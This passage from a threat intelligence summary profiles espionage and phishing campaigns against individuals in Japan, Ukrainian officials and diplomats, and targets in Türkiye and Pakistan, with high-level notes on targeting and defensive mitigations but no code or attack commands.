- Not specified.
## Targeting
- Sectors: Individuals with potential North Korean links.
- Geography: Japan.
- Victims: Individuals in Japan.
## Tools & Infrastructure
- Not specified.
## Implications
Indicates nuanced, likely counter-intelligence focused espionage targeting specific individuals based on tangential international relationships.
## Mitigations
Heightened scrutiny on external communications for individuals identified as potential intelligence targets.
***
# Threat Actor: Unidentified Threat Actor (WEF/Election Impersonation)
## Attribution & Identity
As yet **unidentified threat actor**.
## Activity Summary
Conducted a highly **targeted phishing campaign** impersonating the World Economic Forum (WEF) and election websites to obtain sensitive information.
## Tactics, Techniques & Procedures
- **Highly targeted phishing**.
- Impersonation of **World Economic Forum (WEF)** and **election websites**.
## Targeting
- Sectors: Government/Diplomatic personnel.
- Geography: Ukraine (targets).
- Victims: Ukrainian officials and diplomats.
## Tools & Infrastructure
- Not specified.
## Implications
A narrowly targeted credential- and information-theft effort aimed at Ukrainian officials and diplomats during a sensitive political period.
## Mitigations
Conduct rigorous security awareness training focusing on spearphishing, especially during election cycles or major international events like WEF meetings.
***
# Threat Actor: StealthFalcon
## Attribution & Identity
Alignment not stated in this summary.
## Activity Summary
Conducted **espionage focused operations**.
## Tactics, Techniques & Procedures
- Not specified.
## Targeting
- Geography: Türkiye and Pakistan.
- Victims: Not specifically named.
## Tools & Infrastructure
- Not specified.
## Implications
Indicates active, targeted espionage in the Middle East/South Asia region.
## Mitigations
General espionage defense posture hardening recommended for entities in these regions.